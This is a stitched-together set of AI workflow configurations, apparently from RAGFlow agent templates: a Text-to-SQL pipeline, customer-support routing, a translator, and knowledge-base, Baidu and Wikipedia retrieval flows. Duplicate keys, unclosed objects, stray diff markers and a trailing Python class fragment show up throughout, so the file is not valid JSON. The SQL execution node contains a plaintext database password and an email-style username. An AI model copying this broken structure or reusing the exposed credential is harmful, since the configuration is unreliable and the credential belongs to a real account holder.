"max_tokens":256,
"mcp":[],
"message_history_window_size":12,
"outputs":{
"content":{
"type":"string",
"value":""
}
},
"presencePenaltyEnabled":false,
"presence_penalty":0.4,
"prompts":[
{
"content":"User's query: {sys.query}\n\nSchema: {Retrieval:HappyTiesFilm@formalized_content}\n\nSamples about question to SQL: {Retrieval:SmartNewsHammer@formalized_content}\n\nDescription about meanings of tables and fields: {Retrieval:SweetDancersAppear@formalized_content}",
"role":"user"
}
],
"sys_prompt":"### ROLE\nYou are a Text-to-SQL assistant. \nGiven a relational database schema and a natural-language request, you must produce a **single, syntactically-correct MySQL query** that answers the request. \nReturn **nothing except the SQL statement itself**\u2014no code fences, no commentary, no explanations, no comments, no trailing semicolon if not required.\n\n\n### EXAMPLES \n-- Example 1 \nUser: List every product name and its unit price. \nSQL:\nSELECT name, unit_price FROM Products;\n\n-- Example 2 \nUser: Show the names and emails of customers who placed orders in January 2025. \nSQL:\nSELECT DISTINCT c.name, c.email\nFROM Customers c\nJOIN Orders o ON o.customer_id = c.id\nWHERE o.order_date BETWEEN '2025-01-01' AND '2025-01-31';\n\n-- Example 3 \nUser: How many orders have a status of \"Completed\" for each month in 2024? \nSQL:\nSELECT DATE_FORMAT(order_date, '%Y-%m') AS month,\n COUNT(*) AS completed_orders\nFROM Orders\nWHERE status = 'Completed'\n AND YEAR(order_date) = 2024\nGROUP BY month\nORDER BY month;\n\n-- Example 4 \nUser: Which products generated at least \\$10 000 in total revenue? \nSQL:\nSELECT p.id, p.name, SUM(oi.quantity * oi.unit_price) AS revenue\nFROM Products p\nJOIN OrderItems oi ON oi.product_id = p.id\nGROUP BY p.id, p.name\nHAVING revenue >= 10000\nORDER BY revenue DESC;\n\n\n### OUTPUT GUIDELINES\n1. Think through the schema and the request. \n2. Write **only** the final MySQL query. \n3. Do **not** wrap the query in back-ticks or markdown fences. \n4. Do **not** add explanations, comments, or additional text\u2014just the SQL.",
"temperature":0.1,
"temperatureEnabled":false,
"tools":[],
"topPEnabled":false,
"top_p":0.3,
"user_prompt":"",
"visual_files_var":""
}
},
"upstream":[
"Retrieval:HappyTiesFilm",
"Retrieval:SmartNewsHammer",
"Retrieval:SweetDancersAppear"
]
},
"ExeSQL:TiredShirtsPull":{
"downstream":[
"Message:ShaggyMasksAttend"
],
"obj":{
"component_name":"ExeSQL",
"params":{
"database":"",
"db_type":"mysql",
"host":"",
"max_records":1024,
"outputs":{
"formalized_content":{
"type":"string",
"value":""
},
"json":{
"type":"Array<Object>",
"value":[]
}
},
"password":"20010812Yy!",
"port":3306,
"sql":"Agent:WickedGoatsDivide@content",
"username":"13637682833@163.com"
}
},
"upstream":[
"Agent:WickedGoatsDivide"
]
},
"Message:ShaggyMasksAttend":{
"downstream":[],
"obj":{
"component_name":"Message",
"params":{
"content":[
"{ExeSQL:TiredShirtsPull@formalized_content}"
]
}
},
"upstream":[
"ExeSQL:TiredShirtsPull"
]
},
"Retrieval:HappyTiesFilm":{
"downstream":[
"Agent:WickedGoatsDivide"
],
"obj":{
"component_name":"Retrieval",
"params":{
"cross_languages":[],
"empty_response":"",
"kb_ids":[
"ed31364c727211f0bdb2bafe6e7908e6"
],
"keywords_similarity_weight":0.7,
"outputs":{
"formalized_content":{
"type":"string",
"value":""
}
},
"query":"sys.query",
"rerank_id":"",
"similarity_threshold":0.2,
"top_k":1024,
"top_n":8,
"use_kg":false
}
},
"upstream":[
"begin"
]
},
"Retrieval:SmartNewsHammer":{
"downstream":[
"Agent:WickedGoatsDivide"
],
"obj":{
"component_name":"Retrieval",
"params":{
"cross_languages":[],
"empty_response":"",
"kb_ids":[
"0f968106727311f08357bafe6e7908e6"
],
"keywords_similarity_weight":0.7,
"outputs":{
"formalized_content":{
"type":"string",
"value":""
}
},
"query":"sys.query",
"rerank_id":"",
"similarity_threshold":0.2,
"top_k":1024,
"top_n":8,
"use_kg":false
}
},
"upstream":[
"begin"
]
},
"Retrieval:SweetDancersAppear":{
"downstream":[
"Agent:WickedGoatsDivide"
],
"obj":{
"component_name":"Retrieval",
"params":{
"cross_languages":[],
"empty_response":"",
"kb_ids":[
"4ad1f9d0727311f0827dbafe6e7908e6"
],
"keywords_similarity_weight":0.7,
"outputs":{
"formalized_content":{
"type":"string",
"value":""
}
},
"query":"sys.query",
"rerank_id":"",
"similarity_threshold":0.2,
"top_k":1024,
"top_n":8,
"use_kg":false
}
},
"upstream":[
"begin"
]
},
"begin":{
"downstream":[
"Retrieval:HappyTiesFilm",
"Retrieval:SmartNewsHammer",
"Retrieval:SweetDancersAppear"
],
"obj":{
"component_name":"Begin",
"params":{
"enablePrologue":true,
"inputs":{},
"mode":"conversational",
"prologue":"Hi! I'm your SQL assistant. What can I do for you?"
"prologue":"Hi! I'm your SQL assistant. What can I do for you?"
},
"label":"Begin",
"name":"begin"
},
"id":"begin",
"measured":{
"height":48,
"width":200
},
"position":{
"x":50,
"y":200
},
"selected":false,
"sourcePosition":"left",
"targetPosition":"right",
"type":"beginNode"
},
{
"data":{
"form":{
"cross_languages":[],
"empty_response":"",
"kb_ids":[
"ed31364c727211f0bdb2bafe6e7908e6"
],
"keywords_similarity_weight":0.7,
"outputs":{
"formalized_content":{
"type":"string",
"value":""
}
},
"query":"sys.query",
"rerank_id":"",
"similarity_threshold":0.2,
"top_k":1024,
"top_n":8,
"use_kg":false
},
"label":"Retrieval",
"name":"Schema"
},
"dragging":false,
"id":"Retrieval:HappyTiesFilm",
"measured":{
"height":96,
"width":200
},
"position":{
"x":414,
"y":20.5
},
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"retrievalNode"
},
{
"data":{
"form":{
"cross_languages":[],
"empty_response":"",
"kb_ids":[
"0f968106727311f08357bafe6e7908e6"
],
"keywords_similarity_weight":0.7,
"outputs":{
"formalized_content":{
"type":"string",
"value":""
}
},
"query":"sys.query",
"rerank_id":"",
"similarity_threshold":0.2,
"top_k":1024,
"top_n":8,
"use_kg":false
},
"label":"Retrieval",
"name":"Question to SQL"
},
"dragging":false,
"id":"Retrieval:SmartNewsHammer",
"measured":{
"height":96,
"width":200
},
"position":{
"x":406.5,
"y":175.5
},
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"retrievalNode"
},
{
"data":{
"form":{
"cross_languages":[],
"empty_response":"",
"kb_ids":[
"4ad1f9d0727311f0827dbafe6e7908e6"
],
"keywords_similarity_weight":0.7,
"outputs":{
"formalized_content":{
"type":"string",
"value":""
}
},
"query":"sys.query",
"rerank_id":"",
"similarity_threshold":0.2,
"top_k":1024,
"top_n":8,
"use_kg":false
},
"label":"Retrieval",
"name":"Database Description"
},
"dragging":false,
"id":"Retrieval:SweetDancersAppear",
"measured":{
"height":96,
"width":200
},
"position":{
"x":403.5,
"y":328
},
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"retrievalNode"
},
{
"data":{
"form":{
"delay_after_error":1,
"description":"",
"exception_default_value":"",
"exception_goto":[],
"exception_method":"",
"frequencyPenaltyEnabled":false,
"frequency_penalty":0.7,
"llm_id":"qwen-max@Tongyi-Qianwen",
"maxTokensEnabled":false,
"max_retries":3,
"max_rounds":5,
"max_tokens":256,
"mcp":[],
"message_history_window_size":12,
"outputs":{
"content":{
"type":"string",
"value":""
}
},
"presencePenaltyEnabled":false,
"presence_penalty":0.4,
"prompts":[
{
"content":"User's query: {sys.query}\n\nSchema: {Retrieval:HappyTiesFilm@formalized_content}\n\nSamples about question to SQL: {Retrieval:SmartNewsHammer@formalized_content}\n\nDescription about meanings of tables and fields: {Retrieval:SweetDancersAppear@formalized_content}",
"role":"user"
}
],
"sys_prompt":"### ROLE\nYou are a Text-to-SQL assistant. \nGiven a relational database schema and a natural-language request, you must produce a **single, syntactically-correct MySQL query** that answers the request. \nReturn **nothing except the SQL statement itself**\u2014no code fences, no commentary, no explanations, no comments, no trailing semicolon if not required.\n\n\n### EXAMPLES \n-- Example 1 \nUser: List every product name and its unit price. \nSQL:\nSELECT name, unit_price FROM Products;\n\n-- Example 2 \nUser: Show the names and emails of customers who placed orders in January 2025. \nSQL:\nSELECT DISTINCT c.name, c.email\nFROM Customers c\nJOIN Orders o ON o.customer_id = c.id\nWHERE o.order_date BETWEEN '2025-01-01' AND '2025-01-31';\n\n-- Example 3 \nUser: How many orders have a status of \"Completed\" for each month in 2024? \nSQL:\nSELECT DATE_FORMAT(order_date, '%Y-%m') AS month,\n COUNT(*) AS completed_orders\nFROM Orders\nWHERE status = 'Completed'\n AND YEAR(order_date) = 2024\nGROUP BY month\nORDER BY month;\n\n-- Example 4 \nUser: Which products generated at least \\$10 000 in total revenue? \nSQL:\nSELECT p.id, p.name, SUM(oi.quantity * oi.unit_price) AS revenue\nFROM Products p\nJOIN OrderItems oi ON oi.product_id = p.id\nGROUP BY p.id, p.name\nHAVING revenue >= 10000\nORDER BY revenue DESC;\n\n\n### OUTPUT GUIDELINES\n1. Think through the schema and the request. \n2. Write **only** the final MySQL query. \n3. Do **not** wrap the query in back-ticks or markdown fences. \n4. Do **not** add explanations, comments, or additional text\u2014just the SQL.",
"temperature":0.1,
"temperatureEnabled":false,
"tools":[],
"topPEnabled":false,
"top_p":0.3,
"user_prompt":"",
"visual_files_var":""
},
"label":"Agent",
"name":"SQL Generator "
},
"dragging":false,
"id":"Agent:WickedGoatsDivide",
"measured":{
"height":84,
"width":200
},
"position":{
"x":981,
"y":174
},
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"agentNode"
},
{
"data":{
"form":{
"database":"",
"db_type":"mysql",
"host":"",
"max_records":1024,
"outputs":{
"formalized_content":{
"type":"string",
"value":""
},
"json":{
"type":"Array<Object>",
"value":[]
}
},
"password":"20010812Yy!",
"port":3306,
"sql":"Agent:WickedGoatsDivide@content",
"username":"13637682833@163.com"
},
"label":"ExeSQL",
"name":"ExeSQL"
},
"dragging":false,
"id":"ExeSQL:TiredShirtsPull",
"measured":{
"height":56,
"width":200
},
"position":{
"x":1211.5,
"y":212.5
},
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"ragNode"
},
{
"data":{
"form":{
"content":[
"{ExeSQL:TiredShirtsPull@formalized_content}"
]
},
"label":"Message",
"name":"Message"
},
"dragging":false,
"id":"Message:ShaggyMasksAttend",
"measured":{
"height":56,
"width":200
},
"position":{
"x":1447.3125,
"y":181.5
},
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"messageNode"
},
{
"data":{
"form":{
"text":"Searches for relevant database creation statements.\n\nIt should be linked to a knowledge base into which the schema has been dumped. You could use \" General \" as the parsing method, \" 2 \" as the chunk size and \" ; \" as the delimiter."
},
"label":"Note",
"name":"Note Schema"
},
"dragHandle":".note-drag-handle",
"dragging":false,
"height":188,
"id":"Note:ThickClubsFloat",
"measured":{
"height":188,
"width":392
},
"position":{
"x":689,
"y":-180.31251144409183
},
"resizing":false,
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"noteNode",
"width":392
},
{
"data":{
"form":{
"text":"Searches for samples about question to SQL. \n\nYou could use \" Q&A \" as parsing method.\n\nPlease check this dataset:\nhttps://huggingface.co/datasets/InfiniFlow/text2sql"
},
"label":"Note",
"name":"Note: Question to SQL"
},
"dragHandle":".note-drag-handle",
"dragging":false,
"height":154,
"id":"Note:ElevenLionsJoke",
"measured":{
"height":154,
"width":345
},
"position":{
"x":693.5,
"y":138
},
"resizing":false,
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"noteNode",
"width":345
},
{
"data":{
"form":{
"text":"Searches for description about meanings of tables and fields.\n\nYou could use \" General \" as parsing method, \" 2 \" as chunk size and \" ### \" as delimiter."
},
"label":"Note",
"name":"Note: Database Description"
},
"dragHandle":".note-drag-handle",
"dragging":false,
"height":158,
"id":"Note:ManyRosesTrade",
"measured":{
"height":158,
"width":408
},
"position":{
"x":691.5,
"y":435.69736389555317
},
"resizing":false,
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"noteNode",
"width":408
},
{
"data":{
"form":{
"text":"The Agent learns which tables may be available based on the responses from three knowledge bases and converts the user's input into SQL statements."
},
"label":"Note",
"name":"Note: SQL Generator"
},
"dragHandle":".note-drag-handle",
"dragging":false,
"height":132,
"id":"Note:RudeHousesInvite",
"measured":{
"height":132,
"width":383
},
"position":{
"x":1106.9254833678003,
"y":290.5891036507015
},
"resizing":false,
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"noteNode",
"width":383
},
{
"data":{
"form":{
"text":"Connect to your database to execute SQL statements."
"prompt":"You are an intelligent assistant. Please answer the user's question based on what Baidu searched. First, please output the user's question and the content searched by Baidu, and then answer yes, no, or i don't know.Here is the user's question:{user_input}The above is the user's question.Here is what Baidu searched for:{baidu}The above is the content searched by Baidu.",
"description":"The question is about the product usage, appearance and how it works.",
"examples":"Why it always beaming?\nHow to install it onto the wall?\nIt leaks, what to do?",
"to":"message:0"
"to":["agent:0"]
},
"others":{
"description":"The question is not about the product usage, appearance and how it works.",
"examples":"How are you doing?\nWhat is your name?\nAre you a robot?\nWhat's the weather?\nWill it rain?",
"to":"message:1"
"to":["message:0"]
}
}
}
},
"downstream":["message:0","message:1"],
"upstream":["answer:0"]
"downstream":[],
"upstream":["begin"]
},
"message:0":{
"obj":{
"component_name":"Message",
"params":{
"messages":[
"Message 0!!!!!!!"
"content":[
"Sorry, I don't know. I'm an AI bot."
]
}
},
"downstream":["answer:0"],
"downstream":[],
"upstream":["categorize:0"]
},
"agent:0":{
"obj":{
"component_name":"Agent",
"params":{
"llm_id":"deepseek-chat",
"sys_prompt":"You are a smart researcher. You could generate proper queries to search. According to the search results, you could decide the next query if the results are not enough.",
"description":"The question is about the product usage, appearance and how it works.",
"examples":"Why it always beaming?\nHow to install it onto the wall?\nIt leaks, what to do?\nException: Can't connect to ES cluster\nHow to build the RAGFlow image from scratch",
"to":"retrieval:0"
},
"casual":{
"description":"The question is not about the product usage, appearance and how it works. Just casual chat.",
"examples":"How are you doing?\nWhat is your name?\nAre you a robot?\nWhat's the weather?\nWill it rain?",
"to":"generate:casual"
},
"complain":{
"description":"Complain even curse about the product or service you provide. But the comment is not specific enough.",
"examples":"How bad is it.\nIt's really sucks.\nDamn, for God's sake, can it be more steady?\nShit, I just can't use this shit.\nI can't stand it anymore.",
"to":"generate:complain"
},
"answer":{
"description":"This answer provide a specific contact information, like e-mail, phone number, wechat number, line number, twitter, discord, etc,.",
"examples":"My phone number is 203921\nkevinhu.hk@gmail.com\nThis is my discord number: johndowson_29384",
"prompt":"You are a customer support agent, but the customer wants to have a casual chat with you instead of asking about the product. Be nice, funny, enthusiastic, and caring.",
"temperature":0.9,
"message_history_window_size":12,
"cite":false
}
},
"downstream":["answer:0"],
"upstream":["categorize:0"]
},
"generate:complain":{
"obj":{
"component_name":"Generate",
"params":{
"llm_id":"deepseek-chat",
"prompt":"You are a customer support agent. Customers complain, even curse, about the products, but not specifically enough. You need to ask them what the specific problem with the product is. Be nice, patient, and caring to soothe your customers’ emotions first.",
"prompt":"You are an intelligent assistant. Please answer the question based on content of knowledge base. When all knowledge base content is irrelevant to the question, your answer must include the sentence \"The answer you are looking for is not found in the knowledge base!\". Answers need to consider chat history.\n Knowledge base content is as following:\n {input}\n The above is the content of knowledge base.",
"temperature":0.02
}
},
"downstream":["answer:0"],
"upstream":["relevant:0"]
},
"generate:ask_contact":{
"obj":{
"component_name":"Generate",
"params":{
"llm_id":"deepseek-chat",
"prompt":"You are a customer support agent, but you can't answer the customer's question. You need to request their contact information, such as e-mail, phone number, WeChat number, LINE number, Twitter, Discord, etc. Product experts will contact them later. Please do not ask the same question twice.",
"temperature":0.9,
"message_history_window_size":12,
"cite":false
}
},
"downstream":["answer:0"],
"upstream":["relevant:0"]
},
"message:get_contact":{
"obj":{
"component_name":"Message",
"params":{
"messages":[
"Okay, I've written this down. What else can I do for you?",
"Got it. What else can I do for you?",
"Thanks for your trust! Our expert will contact you ASAP. So, is there anything else I can do for you?",
"prologue":"Hi there! Please enter the text you want to translate in format like: 'text you want to translate' => target language. For an example: 您好! => English"
}
},
"downstream":["answer:0"],
"upstream":[]
},
"answer:0":{
"obj":{
"component_name":"Answer",
"params":{}
},
"downstream":["generate:0"],
"upstream":["begin","generate:0"]
},
"generate:0":{
"obj":{
"component_name":"Generate",
"params":{
"llm_id":"deepseek-chat",
"prompt":"You are a professional interpreter.\n- Role: a professional interpreter.\n- Input format: content to be translated => target language. \n- Answer format: => translated content in target language. \n- Examples:\n - user: 您好! => English. assistant: => How are you doing!\n - user: You look good today. => Japanese. assistant: => 今日は調子がいいですね 。\n",
"prologue":"Hi there! Please enter the text you want to translate in format like: 'text you want to translate' => target language. For an example: 您好! => English"
}
},
"downstream":["answer:0"],
"upstream":[]
},
"answer:0":{
"obj":{
"component_name":"Answer",
"params":{}
},
"downstream":["generate:0"],
"upstream":["begin","generate:0"]
},
"generate:0":{
"obj":{
"component_name":"Generate",
"params":{
"llm_id":"deepseek-chat",
"prompt":"You are a professional interpreter.\n- Role: a professional interpreter.\n- Input format: content to be translated => target language. \n- Answer format: => translated content in target language. \n- Examples:\n - user: 您好! => English. assistant: => How are you doing!\n - user: You look good today. => Japanese. assistant: => 今日は調子がいいですね 。\n",
"sys_prompt":"You are a helpful research assistant. \nPlease decompose the user's topic: '{sys.query}' into several meaningful sub-topics. \nThe output format MUST be a string array like: [\"sub-topic1\", \"sub-topic2\", ...]. Redundant information is forbidden.",
"sys_prompt":"Your goal is to provide answers based on information from the internet. \nYou must use the provided search results to find relevant online information. \nYou should never use your own knowledge to answer questions.\nPlease include relevant url sources in the end of your answers.\n\n \"{tavily:0@formalized_content}\" \nUsing the above information, answer the following question or topic: \"{iterationitem:0@result} \"\nin a detailed report — The report should focus on the answer to the question, should be well structured, informative, in depth, with facts and numbers if available, a minimum of 200 words and with markdown syntax and apa format. Write all source urls at the end of the report in apa format. You should write your report only based on the given information and nothing else.",
"prompt":"- Role: You're a question analyzer.\n - Requirements:\n - Summarize user's question, and give top %s important keyword/phrase.\n - Use comma as a delimiter to separate keywords/phrases.\n - Answer format: (in language of user's question)\n - keyword: ",
"temperature":0.2,
"top_n":1
}
},
"downstream":["wikipedia:0"],
"upstream":["answer:0"]
},
"wikipedia:0":{
"obj":{
"component_name":"Wikipedia",
"params":{
"top_n":10
}
},
"downstream":["generate:0"],
"upstream":["keyword:0"]
},
"generate:1":{
"obj":{
"component_name":"Generate",
"params":{
"llm_id":"deepseek-chat",
"prompt":"You are an intelligent assistant. Please answer the question based on content from Wikipedia. When the answer from Wikipedia is incomplete, you need to output the URL link of the corresponding content as well. When all the content searched from Wikipedia is irrelevant to the question, your answer must include the sentence, \"The answer you are looking for is not found in the Wikipedia!\". Answers need to consider chat history.\n The content of Wikipedia is as follows:\n {input}\n The above is the content of Wikipedia.",
"prompt":"You are an intelligent assistant. Please summarize the content of the knowledge base to answer the question. Please list the data in the knowledge base and answer in detail. When all knowledge base content is irrelevant to the question, your answer must include the sentence \"The answer you are looking for is not found in the knowledge base!\" Answers need to consider chat history.\n Here is the knowledge base:\n {input}\n The above is the knowledge base.",
"sys_prompt":"You are an intelligent assistant. Please summarize the content of the knowledge base to answer the question. Please list the data in the knowledge base and answer in detail. When all knowledge base content is irrelevant to the question, your answer must include the sentence \"The answer you are looking for is not found in the knowledge base!\" Answers need to consider chat history.\n Here is the knowledge base:\n {retrieval:0@formalized_content}\n The above is the knowledge base.",
"description":"The question is about the product usage, appearance and how it works.",
"examples":"Why it always beaming?\nHow to install it onto the wall?\nIt leaks, what to do?",
"to":"retrieval:0"
"examples":[],
"to":["retrieval:0"]
},
"others":{
"description":"The question is not about the product usage, appearance and how it works.",
"examples":"How are you doing?\nWhat is your name?\nAre you a robot?\nWhat's the weather?\nWill it rain?",
"to":"message:0"
"examples":[],
"to":["message:0"]
}
}
}
},
"downstream":["retrieval:0","message:0"],
"upstream":["answer:0"]
"downstream":[],
"upstream":["begin"]
},
"message:0":{
"obj":{
"component_name":"Message",
"params":{
"messages":[
"content":[
"Sorry, I don't know. I'm an AI bot."
]
}
},
"downstream":["answer:0"],
"downstream":[],
"upstream":["categorize:0"]
},
"retrieval:0":{
@@ -60,29 +52,44 @@
"keywords_similarity_weight":0.3,
"top_n":6,
"top_k":1024,
"rerank_id":"BAAI/bge-reranker-v2-m3",
"kb_ids":["869a236818b811ef91dffa163e197198"]
"rerank_id":"",
"empty_response":"Nothing found in dataset",
"kb_ids":["1a3d1d7afb0611ef9866047c16ec874f"]
}
},
"downstream":["generate:0"],
"upstream":["switch:0"]
"upstream":["categorize:0"]
},
"generate:0":{
"obj":{
"component_name":"Generate",
"component_name":"Agent",
"params":{
"llm_id":"deepseek-chat",
"prompt":"You are an intelligent assistant. Please summarize the content of the knowledge base to answer the question. Please list the data in the knowledge base and answer in detail. When all knowledge base content is irrelevant to the question, your answer must include the sentence \"The answer you are looking for is not found in the knowledge base!\" Answers need to consider chat history.\n Here is the knowledge base:\n {input}\n The above is the knowledge base.",
"sys_prompt":"You are an intelligent assistant. Please summarize the content of the knowledge base to answer the question. Please list the data in the knowledge base and answer in detail. When all knowledge base content is irrelevant to the question, your answer must include the sentence \"The answer you are looking for is not found in the knowledge base!\" Answers need to consider chat history.\n Here is the knowledge base:\n {retrieval:0@formalized_content}\n The above is the knowledge base.",
"empty_response":"Sorry, the knowledge base has no related information."
}
},
"downstream":["relevant:0"],
"upstream":["answer:0"]
},
"relevant:0":{
"obj":{
"component_name":"Relevant",
"params":{
"llm_id":"deepseek-chat",
"temperature":0.02,
"yes":"generate:0",
"no":"message:0"
}
},
"downstream":["message:0","generate:0"],
"upstream":["retrieval:0"]
},
"generate:0":{
"obj":{
"component_name":"Generate",
"params":{
"llm_id":"deepseek-chat",
"prompt":"You are an intelligent assistant. Please answer the question based on content of knowledge base. When all knowledge base content is irrelevant to the question, your answer must include the sentence \"The answer you are looking for is not found in the knowledge base!\". Answers need to consider chat history.\n Knowledge base content is as following:\n {input}\n The above is the content of knowledge base.",
"temperature":0.2
}
},
"downstream":["answer:0"],
"upstream":["relevant:0"]
},
"message:0":{
"obj":{
"component_name":"Message",
"params":{
"messages":[
"Sorry, I don't know. Please leave your contact, our experts will contact you later. What's your e-mail/phone/wechat?",
"I'm an AI bot and not quite sure about this question. Please leave your contact, our experts will contact you later. What's your e-mail/phone/wechat?",
"Can't find answer in my knowledge base. Please leave your contact, our experts will contact you later. What's your e-mail/phone/wechat?"
"empty_response":"Sorry, the knowledge base has no related information."
}
},
"downstream":["relevant:0"],
"upstream":["answer:0"]
},
"relevant:0":{
"obj":{
"component_name":"Relevant",
"params":{
"llm_id":"deepseek-chat",
"temperature":0.02,
"yes":"generate:0",
"no":"keyword:0"
}
},
"downstream":["keyword:0","generate:0"],
"upstream":["retrieval:0"]
},
"generate:0":{
"obj":{
"component_name":"Generate",
"params":{
"llm_id":"deepseek-chat",
"prompt":"You are an intelligent assistant. Please answer the question based on content of knowledge base. When all knowledge base content is irrelevant to the question, your answer must include the sentence \"The answer you are looking for is not found in the knowledge base!\". Answers need to consider chat history.\n Knowledge base content is as following:\n {input}\n The above is the content of knowledge base.",
"temperature":0.2
}
},
"downstream":["answer:0"],
"upstream":["relevant:0"]
},
"keyword:0":{
"obj":{
"component_name":"KeywordExtract",
"params":{
"llm_id":"deepseek-chat",
"prompt":"- Role: You're a question analyzer.\n - Requirements:\n - Summarize user's question, and give top %s important keyword/phrase.\n - Use comma as a delimiter to separate keywords/phrases.\n - Answer format: (in language of user's question)\n - keyword: ",
"temperature":0.2,
"top_n":1
}
},
"downstream":["baidu:0"],
"upstream":["relevant:0"]
},
"baidu:0":{
"obj":{
"component_name":"Baidu",
"params":{
"top_n":10
}
},
"downstream":["generate:1"],
"upstream":["keyword:0"]
},
"generate:1":{
"obj":{
"component_name":"Generate",
"params":{
"llm_id":"deepseek-chat",
"prompt":"You are an intelligent assistant. Please answer the question based on content searched from Baidu. When the answer from a Baidu search is incomplete, you need to output the URL link of the corresponding content as well. When all the content searched from Baidu is irrelevant to the question, your answer must include the sentence, \"The answer you are looking for is not found in the Baidu search!\". Answers need to consider chat history.\n The content of Baidu search is as follows:\n {input}\n The above is the content of Baidu search.",
"empty_response":"Sorry, the knowledge base has no related information."
}
},
"downstream":["relevant:0"],
"upstream":["answer:0","rewrite:0"]
},
"relevant:0":{
"obj":{
"component_name":"Relevant",
"params":{
"llm_id":"deepseek-chat",
"temperature":0.02,
"yes":"generate:0",
"no":"rewrite:0"
}
},
"downstream":["generate:0","rewrite:0"],
"upstream":["retrieval:0"]
},
"generate:0":{
"obj":{
"component_name":"Generate",
"params":{
"llm_id":"deepseek-chat",
"prompt":"You are an intelligent assistant. Please answer the question based on content of knowledge base. When all knowledge base content is irrelevant to the question, your answer must include the sentence \"The answer you are looking for is not found in the knowledge base!\". Answers need to consider chat history.\n Knowledge base content is as following:\n {input}\n The above is the content of knowledge base.",
"sys_prompt":"You are an intelligent assistant. Please summarize the content of the knowledge base to answer the question. Please list the data in the knowledge base and answer in detail. When all knowledge base content is irrelevant to the question, your answer must include the sentence \"The answer you are looking for is not found in the knowledge base!\" Answers need to consider chat history.\n Here is the knowledge base:\n {tavily:0@formalized_content}\n The above is the knowledge base.",
"description":"""arXiv is a free distribution service and an open-access archive for nearly 2.4 million scholarly articles in the fields of physics, mathematics, computer science, quantitative biology, quantitative finance, statistics, electrical engineering and systems science, and economics. Materials on this site are not peer-reviewed by arXiv.""",
"parameters":{
"query":{
"type":"string",
"description":"The search keywords to execute with arXiv. The keywords should be the most important words/terms(includes synonyms) from the original request.",
@@ -34,7 +35,7 @@ class CrawlerParam(ComponentParamBase):
        self.check_valid_value(self.extract_type, "Type of content from the crawler", ['html', 'markdown', 'content'])
class Crawler(ComponentBase, ABC):
class Crawler(ToolBase, ABC):
    component_name = "Crawler"
    def _run(self, history, **kwargs):